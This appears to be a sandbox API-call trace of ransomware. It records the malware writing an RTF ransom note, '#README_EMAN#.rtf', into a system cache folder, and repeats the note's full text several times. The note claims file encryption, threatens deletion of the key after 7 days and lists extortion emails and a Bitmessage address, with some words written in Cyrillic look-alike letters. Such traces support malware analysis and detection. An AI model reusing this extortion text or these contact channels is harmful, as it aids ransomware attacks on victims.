th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x83\x94\x0f6\x15<±É~ëüåMÔq\x1dái\x0føÀ9m3\n", lpUsedDefaultChar=0x0) returned 8717 [0221.469] WriteFile (in: hFile=0x2c8, lpBuffer=0x1f4da18*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f4da18*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0221.469] CloseHandle (hObject=0x2c8) returned 1 [0221.469] GetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\#readme_eman#.rtf")) returned 0xffffffff [0221.469] GetLastError () returned 0x2 [0221.470] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f4 [0242.304] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0242.304] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0242.304] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ee8a78, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique 